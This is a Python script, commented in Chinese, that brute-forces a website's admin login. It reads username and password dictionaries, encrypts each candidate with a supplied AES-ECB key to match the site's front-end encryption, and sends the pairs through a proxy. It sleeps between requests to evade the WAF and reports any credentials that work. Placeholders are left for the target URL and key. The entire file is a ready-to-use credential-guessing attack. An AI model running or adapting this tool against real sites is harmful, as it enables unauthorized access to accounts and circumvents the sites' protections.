1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
| from cryptography.fernet import Fernet
import requests
import time
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import json
# 发包休眠时间,防止waf被封
# sleep = time.sleep(20)
# 代理地址池
proxies = {
'http': 'http://localhost:7890',
'https': 'http://localhost:7890'
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/123.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Sec-Gpc": "1",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Te": "trailers",
"Connection": "close"
}
# post 设置需要发送的表单数据
def setPost(username,password):
files = {
"user.userid": (None, username),
"user.userpassword": (None, password),
}
return files
def input_usernameData():
userList = []
with open(r"./username.txt",encoding="utf=8") as f:
for u in f.readlines():
u = u.strip("\n")
userList.append(u)
# print(List)
print("[+] 装载用户名字典,数量:{}".format(len(userList)))
return userList
def input_passwordData():
passwordList = []
with open(r"./password.txt",encoding="utf=8") as f:
for u in f.readlines():
u = u.strip("\n")
passwordList.append(u)
# print(List)
print("[+] 装载密码字典,数量:{}".format(len(passwordList)))
return passwordList
def getRequest(data):
# 目标
url = "填写网站登录后台地址"
print("[+] 爆破目标:{}".format(url))
respond = requests.post(url=url,files=data,headers=headers,proxies=proxies)
print("[+] http.status: {},http.length: {}".format(respond.status_code, len(respond.content)))
print(respond.text)
# 响应包错误标志词
if "错误" in respond.text:
return 1
else:
return 0
def aesCrypto(userList,passwordList):
# aes key
key = b"填写aes密钥"
# key = key.encode('utf-8')
print("[+] 读取aes密钥:{}".format(key))
cipher = AES.new(key,AES.MODE_ECB)
for u in userList:
u = u.encode('utf-8')
# 加密
userData = pad(u,AES.block_size)
encryted_username = cipher.encrypt(userData)
base64_encryted_username = base64.b64encode(encryted_username).decode('utf-8')
for p in passwordList:
p = p.encode('utf-8')
passwordData = pad(p,AES.block_size)
encryted_password = cipher.encrypt(passwordData)
base64_encryted_password = base64.b64encode(encryted_password).decode('utf-8')
IP = whatIP()
print("--------------------------")
print("[+] 当前出口IP:{}".format(IP))
print("[+] payload用户名:{},payload密码:{}".format(base64_encryted_username,base64_encryted_password))
dealFiles = setPost(base64_encryted_username,base64_encryted_password)
# print("[+] POST载荷{}".format(dealFiles))
result = getRequest(dealFiles)
if result == 1:
print("[+] 密码错误……\n--------------------------\n")
# 休眠时间
# time.sleep(sleep)
time.sleep(5)
else:
print("\033[0;34m【+】\033[0m"+" 爆破成功!\n用户名:{},密码:{}".format(u,p))
break
def whatIP():
IP = requests.get(url="https://httpbin.org/ip",headers=headers)
IP = json.loads(IP.text)
IP = IP["origin"]
return IP
if __name__ == "__main__":
print("AES password blasting启动中……")
username_list = input_usernameData()
password_list = input_passwordData()
aesCrypto(username_list,password_list)
print("[+] running over~")
|
